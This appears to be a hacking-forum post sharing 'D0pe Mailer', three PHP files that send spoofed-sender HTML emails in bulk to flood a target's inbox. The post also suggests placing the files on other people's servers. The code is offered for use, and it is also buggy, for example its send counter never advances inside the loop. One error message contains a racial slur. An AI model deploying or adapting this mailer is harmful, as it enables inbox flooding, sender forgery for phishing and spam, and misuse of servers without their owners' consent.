TechnicalSergio
Newbie
- Jan 19, 2010
- 32
- 82
Introducing my first script released on BHW, I hope You Enjoy! 
FEATURES:
* - Support HTML Emails
* - 100% Working Spoof
* - Email Blast Extremely Fast
* - Very Stable
==Add These To Your Server.. Or Someone Elses
==
sendMail.php (Enter Your URL in This Script)
index.php
mail.php
FEATURES:
* - Support HTML Emails
* - 100% Working Spoof
* - Email Blast Extremely Fast
* - Very Stable
==Add These To Your Server.. Or Someone Elses
sendMail.php (Enter Your URL in This Script)
Code:
<style type="text/css">
<!--
body,td,th {
color: #00FF00;
}
body {
background-color: #000000;
}
-->
</style><?
// AdSense Setting
$adOn = "0";
$publisherID = "";
$channelID = "";
$siteURL = "http://www.YURSITE"; // [b]The URL of your site[/b]
$to = $_POST["to"];
$subject = $_POST["subject"];
$contents = $_POST["contents"];
$name = $_POST["name"];
$email = $_POST["email"];
$number = $_POST["number"];
$wait = $_POST["wait"];
$limit = $_POST["limit"];
$sent = 0;
if ((!empty($to)) && (!empty($subject)) && (!empty($contents)) &&
(!empty($name)) && (!empty($email))){
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= 'From: ' . $name . ' <' . $email . ">\r\n" . 'Reply-To: ' . $email . "\r\n";
$headers .= "Content-type:text/html;charset=iso-8859-1" . "\r\n";
while ($number > 0) {
while ($sent < $limit) {
mail($to , $subject, $contents, $headers);
usleep($wait );
}
if ($sent >= $limit) {
sleep(3600);
$sent = 0;
}
$sent++;
$number--;
}
print <<<HERE
<h1>Message Sent Successfully</h1>
<p>Your message has been successfully sent!</p>
<ul>
<li><a href="main.php">Bomb That Inbox :)</a></li>
<li><a href="$siteURL">Back to site home</a></li>
</ul>
<hr>
HERE;
}
else {
print <<<HERE
<h1>Message Not Sent</h1>
<p>Check Your Form Nigga!</p>
<p>Please <a href="main.php">go back</a> and try again.</p>
<hr>
HERE;
}
?>
index.php
Code:
<style type="text/css">
<!--
body,td,th {
color: #00FF00;
}
body {
background-color: #000000;
}
-->
</style><?
print "<h1>D0pe Mailer v1.0 BHW Version -TechnicalSergio</h1>";
HERE;
print <<<HERE
<p>all damages, direct or inderect are the responsibility of the user.<br>the coder takes no responsibility for your actions.</p>
<p><a href="main.php">I AGREE</a>!</p>
<hr>
HERE;
?>
mail.php
Code:
<style type="text/css">
<!--
body,td,th {
color: #00FF00;
}
body {
background-color: #000000;
}
-->
</style><?
// Print header
print "<h1>D0pe Mailer v1.0 BHW Version -TechnicalSergio</h1>";
HERE;
// Show main body
print <<<HERE
<p>R U RDY 4 DIS?
<form action = "sendMail.php"
method = "post">
<table>
<tr>
<td>To* :</td>
<td><input type = "text"
name = "to"
tabindex = "1">
</td>
</tr>
<tr>
<td>Subject* :</td>
<td><input type = "text"
name = "subject"
tabindex = "2">
</td>
</tr>
<tr>
<td>contents* :</td>
<td><textarea name = "contents"
rows = "10"
cols = "75"
tabindex = "3"></textarea>
</td>
</tr>
<tr>
<td>Fake Name* :</td>
<td><input type = "text"
name = "name"
tabindex = "4">
</td>
</tr>
<tr>
<td>Fake Email* :</td>
<td><input type = "text"
name = "email"
tabindex = "5">
</td>
</tr>
<tr>
<td>number of emails* :</td>
<td><input type = "text"
name = "number"
tabindex = "7">
</td>
</tr>
<tr>
<td>Wait time (ms)* :</td>
<td><input type = "text"
name = "wait"
tabindex = "9">
</td>
</tr>
<tr>
<td>my host has a limit on emails* :</td>
<td><input type = "text"
name = "limit"
tabindex = "13">
</td>
</tr>
<tr>
<tr>
<td>
<input type = "submit"
value = "Send"
tabindex = "15">
</td>
<td align = "right">
<p>* Required Field</p>
</td>
</tr>
</table>
</form>
<hr>
HERE;
?>